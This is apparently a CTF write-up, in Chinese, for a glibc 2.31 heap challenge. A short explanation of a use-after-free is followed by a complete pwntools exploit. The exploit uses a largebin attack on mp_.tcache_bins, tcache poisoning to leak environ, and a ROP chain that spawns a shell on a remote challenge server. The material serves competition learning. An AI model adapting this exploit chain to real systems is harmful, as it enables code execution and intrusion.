[长城杯 2022 高校组]glibc_master peiwithhao的WriteUp

题目环境为2.31_9.9
漏洞点位于delete函数存在悬垂指针，且堆快申请范围限制在large
存在uaf，我们即可以通过largebin attack来泄露libc基地址和修改mp_.tcachebins来改大tcachebins的最大值
这里使用到unsortedbin循环过程中置入largebin的过程，其中可以具体参考其中源码，类似与unsortedbin attack的步骤，改大后进行正常的tcachebin attack即可,漏洞利用选择修改返回值即可
exp如下：

from pwn import *
from ctypes import *
context(arch = 'amd64', os = 'linux', log_level = 'info')
context.terminal = ['tmux','splitw','-h']

key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
key_len = len(key)

s   = lambda content : io.send(content)
sl  = lambda content : io.sendline(content)
sa  = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc  = lambda number : io.recv(number)
ru  = lambda content : io.recvuntil(content)
rcl = lambda : io.recvline()

def slog(name, address): print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m")

def debug(cmd = 0):
    if cmd == 0:
        gdb.attach(io)
    else:
        gdb.attach(io, cmd)
    
def get_address(mode = 0): 
    if mode == 0:
        return u64(ru('\x7f')[-6:].ljust(8, b'\x00'))
    elif mode == 1:
        return u64(rc(6).ljust(8, b'\x00'))
    elif mode == 2:
        return int(rc(12), 16)
    elif mode == 3:
        return int(rc(16), 16)
    else :
        return 0

def add(index, size):
    sla(">>", "1")
    sla("index:\n", str(index))
    sla("size:\n", str(size))

def edit(index, con):
    sla(">>", "2")
    context = ''
    sla("index:\n", str(index))
    for i in range(len(con)):
        context += chr((con[i])^u8(key[i%key_len]))
    sla("context:\n", context)

def show(index):
    sla(">>", "3")
    sa("index:\n", str(index))

def delete(index):
    sla(">>", "4")
    sa("index:\n", str(index))


#io = process('./pwn')
io = remote("node4.anna.nssctf.cn", 28257)
add(0, 0x448)
add(1, 0x508)
add(2, 0x438)
delete(0)
add(3, 0x508)
add(4, 0x508)
add(5, 0x508)
add(6, 0x528)
add(7, 0x528)
show(0)
libc_base = get_address() - 0x1ecfe0
slog("libc_base", libc_base)
mptcachebins = libc_base + 0x1ec2d0
slog("mp_.tcache_bins", mptcachebins)

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
delete(2)

# victim->bk_nextsize->fd_nextsize = victim
edit(0, p64(libc_base + 0x1ecbe0)*2 + p64(0) + p64(mptcachebins - 0x20))
add(8, 0x458)

delete(5)
delete(4)

environ = libc_base + libc.sym['_environ']
edit(4, p64(environ))
add(9, 0x508)
add(10, 0x508)
show(10)

stack_addr = get_address()
slog("stack_addr", stack_addr)
ret_addr = stack_addr - 0x110
slog("ret_addr", ret_addr)


delete(7)
delete(6)

edit(6, p64(ret_addr))
add(11, 0x528)
add(12, 0x528)

pop_rdi = 0x23b6a + libc_base
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
ret = libc_base + 0x22679
slog("binsh", binsh)
edit(12, p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system))


io.interactive()


​